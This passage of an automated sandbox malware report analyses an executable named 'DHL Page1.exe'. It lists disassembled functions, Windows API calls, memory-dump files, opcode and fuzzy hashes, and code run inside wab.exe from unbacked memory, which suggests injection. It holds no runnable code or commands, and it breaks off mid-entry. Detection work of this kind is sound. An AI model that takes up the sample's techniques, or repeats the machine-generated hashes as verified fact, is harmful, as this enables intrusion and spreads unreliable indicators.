Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\DHL Page1.exe"$1033
API String ID: 530164218-3746646515
Opcode ID: 30c98123a0ff00d7e3950788fea22d971f0637cc6565b2b7779c6d104cec89da
Instruction ID: 628123f554ceb20700e8963d8978a75a89e427f903bffb9b26901f46d3257fe5
Opcode Fuzzy Hash: 30c98123a0ff00d7e3950788fea22d971f0637cc6565b2b7779c6d104cec89da
Instruction Fuzzy Hash: B511D531A006119BC720DF15DC809777BADEFC9719729827FE901A73E1DB39AD028798

Function 00405307 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405336
CallWindowProcW.USER32(?,?,?,?), ref: 00405387

Part of subcall function 00404344: SendMessageW.USER32(000103D6,00000000,00000000,00000000), ref: 00404356

Strings

, xrefs: 00405317

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 83dda6701b15877ac1436a8efcde87d2249ca99db9eb141d4984d101aee1882c
Instruction ID: 127a6563868a7d53e28ac38c21bc59c6fcf94c80a0189a6920e26a43f7176097
Opcode Fuzzy Hash: 83dda6701b15877ac1436a8efcde87d2249ca99db9eb141d4984d101aee1882c
Instruction Fuzzy Hash: 71017171900A0DEBEF305F61DD81E9B3625EB84794F504137FE14751D0C7BA8C929E69

Function 00405C34 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL Page1.exe,C:\Users\user\Desktop\DHL Page1.exe,80000000,00000003), ref: 00405C3A
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL Page1.exe,C:\Users\user\Desktop\DHL Page1.exe,80000000,00000003), ref: 00405C4A

Strings

C:\Users\user\Desktop, xrefs: 00405C34

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
Instruction ID: 48333f3730542792406d75f574d4279f727c9272e6f72c0639f01683d3746b3f
Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
Instruction Fuzzy Hash: B7D0A7B3414A30DAE3127704DD41D9F73ACEF12304746446AF940A7165D7785CC18BEC

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Function 00405D6E Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040604F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D7E
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D96
CharNextA.USER32(00000000,?,00000000,0040604F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DA7
lstrlenA.KERNEL32(00000000,?,00000000,0040604F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DB0

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
Instruction ID: 9e10a5a30b8c711bec4e762c8f844a67ef0aa016e97d09da7f7eb54ca550ed89
Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
Instruction Fuzzy Hash: 4CF0F635100954FFC7029FA5CD0499FBBA8EF46350B2180BAE841F7210D674EE019B98

Analysis Process: wab.exePID: 2640, Parent PID: 6196COMMON

Execution Graph

Execution Coverage:	12.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	22
Total number of Limit Nodes:	4

Executed Functions

Function 3A563C60 Relevance: 4.0, Strings: 3, Instructions: 299
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D@D, xrefs: 3A563F0F
D@D, xrefs: 3A563ED0
D@D, xrefs: 3A563DB7

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID: D@D$D@D$D@D
API String ID: 0-2794098928
Opcode ID: 2e443ff42e46641b44459ff9c34c3af77173abf249cabb61b422256cfe4440e4
Instruction ID: b09b50d26980046dbbececc28ca2727e10d13cf57c8ab9c491ecf99e00d6c235
Opcode Fuzzy Hash: 2e443ff42e46641b44459ff9c34c3af77173abf249cabb61b422256cfe4440e4
Instruction Fuzzy Hash: 94B1CF75A002199FEB14DFA9C8507AEBBB6FF88324F54452AE506EB390C7359D01CBD1

Function 3A560040 Relevance: 2.4, Instructions: 2355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95597d81db34c9dbf937d86dde131c8ca789d04350b06143f5ce67ff3db0da9c
Instruction ID: 62b72aabcc530535b522a9e8dfa6e7e86966326716d407272d058a94bc1673c0
Opcode Fuzzy Hash: 95597d81db34c9dbf937d86dde131c8ca789d04350b06143f5ce67ff3db0da9c
Instruction Fuzzy Hash: E6333E31D107198EDB15EF68C8805ADF7B1FF99300F15D69AE449BB221EB70AAC5CB81

Function 3A56E140 Relevance: .6, Instructions: 639
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45e58a11112dd7dfc12123efba62f32b8268b4a89b4b5b992910d34f485211a0
Instruction ID: 0b51a48cf45d79120649cda7b2268294f88168624262e655f4a6300bab7deb75
Opcode Fuzzy Hash: 45e58a11112dd7dfc12123efba62f32b8268b4a89b4b5b992910d34f485211a0
Instruction Fuzzy Hash: 85328134B02245CFEB44DBA8C490B9EB7B3EB88354F149469E905EB391DB35EC46CB90

Function 3A5677D0 Relevance: .6, Instructions: 588
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a6f6b7b9c8a9d99cba58eef9ffaf2683c458b28ec719588b3b9e5cd9f77ee28
Instruction ID: f21249e54171fe02f8dcc9b2535006cb220fef2b884388bb619b1507cbcc273b
Opcode Fuzzy Hash: 5a6f6b7b9c8a9d99cba58eef9ffaf2683c458b28ec719588b3b9e5cd9f77ee28
Instruction Fuzzy Hash: D8121575F002049FEB10DB64C88069EBBB2EF86358F189479D856EB365DB34ED46CB90

Function 3A56D1F2 Relevance: .6, Instructions: 560COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eefed2ca11f8784c5d97628d4ad5dbe23c6c9806e6cb732f9f426fb957206089
Instruction ID: 99b5316b07b91a4c726811c259e65a3daaa8bd4f470ea82b1b6500d2c090ad39
Opcode Fuzzy Hash: eefed2ca11f8784c5d97628d4ad5dbe23c6c9806e6cb732f9f426fb957206089
Instruction Fuzzy Hash: A722A379F005098BEB50DBA8C49079DB7B2FB89354F689A26E405FB3A1DA34DC41CB91

Function 3A565698 Relevance: .5, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a101cc7f2a85da6a2d916ef0c675fd3226005e4444e1e055c6e04c3a33e31a8c
Instruction ID: 9fda5f49622f313e383f74fc2755a202554e3ef565908711e813deadd350674e
Opcode Fuzzy Hash: a101cc7f2a85da6a2d916ef0c675fd3226005e4444e1e055c6e04c3a33e31a8c
Instruction Fuzzy Hash: D7323034E1071ACBDB14EFB5C89059DB7B6FFC9300F54D6AAD409A7264EB709985CB80

Function 3A563652 Relevance: 4.0, Strings: 3, Instructions: 245
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D@D, xrefs: 3A5638AF
D@D, xrefs: 3A5638EE
D@D, xrefs: 3A56392D

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID: D@D$D@D$D@D
API String ID: 0-2794098928
Opcode ID: 006425c5406135622587c4b61008a0077fec6ba2514af055d40b3fcf64648092
Instruction ID: 91ca1f50063afb1d064cb7d4cd0acfdabc668b47e80a48e2546f2e251ae9ec57
Opcode Fuzzy Hash: 006425c5406135622587c4b61008a0077fec6ba2514af055d40b3fcf64648092
Instruction Fuzzy Hash: C291E474B002199FEB15DFA4C890B9EBBB2FF85314F544969E54AEB2A0C734ED41CB81

Function 3A5639B5 Relevance: 2.7, Strings: 2, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D@D, xrefs: 3A563A80
D@D, xrefs: 3A563A41

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID: D@D$D@D
API String ID: 0-1443409160
Opcode ID: 48f661b86fd770b075732da395886f737309700eb053da4908a32023d5338128
Instruction ID: 077e02cc117fc92be1f984f3f2b69ae27d79cd1d4a8eb0c901083b82fcc07b26
Opcode Fuzzy Hash: 48f661b86fd770b075732da395886f737309700eb053da4908a32023d5338128
Instruction Fuzzy Hash: 8651A075E002148FDB15CF69C4807AEBBF1FF89324F55852AD90AEB360C735A945CB91

Function 0047F950 Relevance: 1.5, APIs: 1, Instructions: 19
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0047F96A

Memory Dump Source

Source File: 00000004.00000002.127055116754.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_470000_wab.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5264af0657ca526c4ca1ab6ebbf0ab3d6cc34d58d239fdf9ed0b986feb500d7b
Instruction ID: a59b1238b1ef86c140736727d5cc2f9a459ee0121f10883e6e0b3c8948077294
Opcode Fuzzy Hash: 5264af0657ca526c4ca1ab6ebbf0ab3d6cc34d58d239fdf9ed0b986feb500d7b
Instruction Fuzzy Hash: 5DD0A7F0604246B7EF3055B8C4483AB334CD35A310F508437FA4ED3341E729DC498526

Function 3A5649C0 Relevance: 1.0, Instructions: 1006COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96b3959216f348d8c2baccd3f756efdae1033dce9b26c417fe474f7322176038
Instruction ID: 8954a7355369b8fbbacebfa666d05ca9d83b76101835964ad108413eb78135fd
Opcode Fuzzy Hash: 96b3959216f348d8c2baccd3f756efdae1033dce9b26c417fe474f7322176038
Instruction Fuzzy Hash: 23926A34A00204CFEB54DF68C584A5DB7F2EF49359F5994AAD44AAB361DB35EC82CF80

Function 3A568CB0 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4295c73f6daf7b8aed51b4867b575e8469a49ef9b73b1f1b240dc2fe46c4a2b9
Instruction ID: b7a1b198367c3bdffbebe7acf3ff692ea47d8ff0bf25ab361160c6523d59a90f
Opcode Fuzzy Hash: 4295c73f6daf7b8aed51b4867b575e8469a49ef9b73b1f1b240dc2fe46c4a2b9
Instruction Fuzzy Hash: DBA16B34A00204DFD714DF68C594A5EB7F3EF88359F589469E40AAB3A0DB35ED46CB90

Function 3A5667F4 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b8546c77e61c02a59a089d480a858131bff05ae032fa770354d9104ea382a66
Instruction ID: 2ba65ce4dd0d90ded92f6ad4df06f7464b343f538af382e63a2b9b00cb24ae53
Opcode Fuzzy Hash: 1b8546c77e61c02a59a089d480a858131bff05ae032fa770354d9104ea382a66
Instruction Fuzzy Hash: 1AA18F34E00219CFEB54CF68C890B8DBBB1FF89304F248599D549AB255DB75AA86CF90

Function 3A5664D0 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe35e7263d8817dc1f134d206685833425d6505e1c995c30933b8e4397359ab2
Instruction ID: 40482dabffd37153a181f9d35e4b9bc29f62c2e7a477afb14367952f43e6f41a
Opcode Fuzzy Hash: fe35e7263d8817dc1f134d206685833425d6505e1c995c30933b8e4397359ab2
Instruction Fuzzy Hash: 0B814B34B012498BDB48DFB8C4547AEB7B3EF88304F548529D40AEB7A4EA75DC468B91

Function 3A566808 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ca61bc6986feecd727f861901558463caed6e490d80a7d4f54a645b2d486ce1
Instruction ID: ae1837b9e483560e2a3644104ba7a472dbb4075547dd45adf28248f1f0a24b9b
Opcode Fuzzy Hash: 8ca61bc6986feecd727f861901558463caed6e490d80a7d4f54a645b2d486ce1
Instruction Fuzzy Hash: E5915C34E0021ACBEB54DF68C890B8DB7B1FF89304F24C699D549AB354DB75AA85CF90

Function 3A562B01 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4104b08b5ded16c2fa8778f2590dd64c83e81df9b8e159dac4be8e2bf5ebec16
Instruction ID: fea0cc85ff1e96e888057d36bdd4fddf03a934a44ecb50451716d0db44f7416a
Opcode Fuzzy Hash: 4104b08b5ded16c2fa8778f2590dd64c83e81df9b8e159dac4be8e2bf5ebec16
Instruction Fuzzy Hash: FA619030F002199BEB19DBB5C8506EEBBB2AFC8700F54812AD406BB391DF34A946C7D4

Function 3A566DA0 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15d83e9f17732637023a876372eec82e7db0346dacebdec4a8a3160b534bdb18
Instruction ID: e067bc4f5bbc57430d65b767fea0e20af3d1ca1bad9152dd7ae8a429d11b3c74
Opcode Fuzzy Hash: 15d83e9f17732637023a876372eec82e7db0346dacebdec4a8a3160b534bdb18
Instruction Fuzzy Hash: 4161A070A002189FEB549FA5C8547AEBBF6FF8C304F20846AE105EB3A5DE754C45CB94

Function 3A566D90 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46cfb8f636e79cf5c4f94d0fafe92754410df4c0bd01d1eb75c512d8e85cd94b
Instruction ID: 6f0adda82c4e401209d8516f6d2f9b46b7d1e622bfee77f06154e103724f718d
Opcode Fuzzy Hash: 46cfb8f636e79cf5c4f94d0fafe92754410df4c0bd01d1eb75c512d8e85cd94b
Instruction Fuzzy Hash: CB51C574B012089FEB549FA9C85479EBBF6FF88344F24853AE105EB7A5CA758C05CB90

Function 3A56B0F8 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0938376855e1e1cd0c88a4ee0a9f7d051e8cb7b521a37a40928f65b073946737
Instruction ID: 31ec94f560a7eb227b34503b496746d38b714975a06d5e1fbec134553389f6d2
Opcode Fuzzy Hash: 0938376855e1e1cd0c88a4ee0a9f7d051e8cb7b521a37a40928f65b073946737
Instruction Fuzzy Hash: C0519F74B001469FDB54EB74C8A07AEB7F3FF88244F51846AD40AEB354EA31DC428BA0

Function 3A56764A Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93b606014feda7ceef30d5c825bbac4d765706616fa8048804528495d1af08f5
Instruction ID: f7aa11b9657c0a3e1c4e7a90479c97556430f0598e3f4b4920e7e7031e4f1fe4
Opcode Fuzzy Hash: 93b606014feda7ceef30d5c825bbac4d765706616fa8048804528495d1af08f5
Instruction Fuzzy Hash: 5C41A135E006058FEB61CFA9C8807DFF7F2FB86314F24492AD155D7661D731A8458B91

Function 3A563448 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 075f85006fc93a1a696c103f1397634a12b1c6c4810ac7a4abd0bbf21e0d8bd5
Instruction ID: bd12cde691250c55da887d915f34e15bcc41eab2203574d76a2b83324534a9d7
Opcode Fuzzy Hash: 075f85006fc93a1a696c103f1397634a12b1c6c4810ac7a4abd0bbf21e0d8bd5
Instruction Fuzzy Hash: 2531C330B002045FEB509BADCC95B9FBAA6FFC9764F248169E125EB3D8CA759C018794

Function 3A564835 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7de35fb4c5446756a3cb8d42cc70e56c33b2f8adacdba644cd7235fe39e4f840
Instruction ID: 11da60aa26a38a0126591e78fad7570f0d4f592107e3aa93827af467272c13f2
Opcode Fuzzy Hash: 7de35fb4c5446756a3cb8d42cc70e56c33b2f8adacdba644cd7235fe39e4f840
Instruction Fuzzy Hash: CD31C074B002458FDB49AB74C95066E7BB2AF89745F18957DD402EB3A2DE35CC42CBD0

Function 3A563458 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a52a0c1cd52ec238b395dd476fd460798b9af57b1e7e3b2d9b3f2a0faa64afe
Instruction ID: 5e2030646bf9115c4e0870b5423e1f2dabd5874da21da41f1f943d0f49ccf95d
Opcode Fuzzy Hash: 8a52a0c1cd52ec238b395dd476fd460798b9af57b1e7e3b2d9b3f2a0faa64afe
Instruction Fuzzy Hash: 1031A730B002045FE7109BADCC55B9FBAE6FFC8764F248169E125E73D8CA759C018794

Function 3A564848 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcb9aa3f73c93e0b433bafc37c8291c0ee35b77bbfd7f5de8cc68dc1b481c84b
Instruction ID: 36c29ce93f124308c2730c690319c8a370d3b7a1b725538362e65c2bb1215a7b
Opcode Fuzzy Hash: fcb9aa3f73c93e0b433bafc37c8291c0ee35b77bbfd7f5de8cc68dc1b481c84b
Instruction Fuzzy Hash: 4F31BE74B002459FDB48AB75C95466E7BB3AB89B46F18952CD402EB3A1EE35CC428BD0

Function 3A562329 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8a4f82698a444c770c999ea10284fb5a64c8d85dee36fec10eae6bdd65fb895
Instruction ID: 9308e58b66d1a02bc68b4abd858f63e84a8366d37d0847404b004aa1872a4c4b
